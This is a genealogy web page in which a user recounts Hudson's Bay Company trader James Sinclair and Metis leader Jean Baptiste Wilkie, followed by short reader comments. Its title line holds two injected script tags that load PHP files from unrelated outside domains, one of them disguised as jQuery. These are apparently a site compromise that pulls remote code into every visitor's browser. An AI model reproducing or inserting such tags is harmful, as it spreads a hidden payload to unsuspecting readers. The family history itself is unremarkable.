James SINCLAIR - Fur Trader<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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James SINCLAIR - Fur Trader

Journal by mwilkie

When I first started searching for stories about the SINCLAIR and WILKIE family, I simply googled their names. From this I found some interesting links for both families to the Hudson's Bay Company.

Interesting enough, brothers Henry (Harry) Sinclair CLARK (1882-1962) and Alexander Sinclair CLARK (1878-1962) traveled to Nelson, British Columbia, Canada in 1907. Alex worked and became a manager for the Hudson's Bay Company in Nelson, British Columbia. Both brothers built up a ranch and a fruit farm.

If your looking for an interesting story about the SINCLAIR or WILKIE family, go to to http://en.wikipedia.org/wiki/James_Sinclair_(fur_trade)or http://en.wikipedia.org/wiki/Jean_Baptiste_Wilkie

James SINCLAIR (1811-1856) was a trader and explorer with the Hudson's Bay Company. He was the son of Hudson's Bay Company factor William SINCLAIR, from Eastaquoy in Harray, and his Cree wife, Nahovway. James was born in Rupert's Land and educated in Scotland at Edinburgh University. He twice led large parties of settlers half-way across Canada, from the Red River Valley to the Columbia River valley.

Jean Baptiste WILKIE
On June 15, 1840, Chief WILKIE led 1,630 hunters in a buffalo hunt. A council was held to elect the leaders of the hunt, and ten captains were named. WILKIE was elected to be the most senior captain.

Many Native Americans stopped at his house in St. Joseph. In 1861, several Sioux and Chippewa opened fire on each other. Red Bear, the brother of a Chippewa chief, was among those killed.

In the 1860s, Chief WILKIE made peace between the Metis and the Dakota, who had been enemies for many generations. Wilkie and Peter Grant traveled to Washington and met with U.S. President Abraham LINCOLN, who provided them with ammunition. WILKIE and several other men went into a Dakota village and asked to meet with the chief. The meeting started off tense, and the Dakota warriors were said to have been so angry that they slashed the cloth covering the lodge. After smoking the pipe of peace, an agreement was made. Later, the Metis and Dakota met at Grand Coteau in order to trade and get to know each other. It was said that out of the hundred that came, none left with the same horse they brought.

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by mwilkie Profile | Research | Contact | Subscribe | Block this user
on 2011-02-23 17:16:39

I'm a bit of a history buff. My brother Robert (Bob)from Ontario, Canada and a Thomas Middlemass from Scotland were researching the Sinclair family tree and sparked my interest in research.

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user edmondsallan deactivated
by Mike1961 on 2012-02-21 19:12:22

Hey there. There is a branch of my long distant ancestors that where with the Sinclair party that left Winnipeg to Oregon in 1843. The family that I am connected to is the Flett's

by mwilkie on 2012-02-21 19:43:14

Hey Mike, nice to hear from a distant Sinclair cousin.

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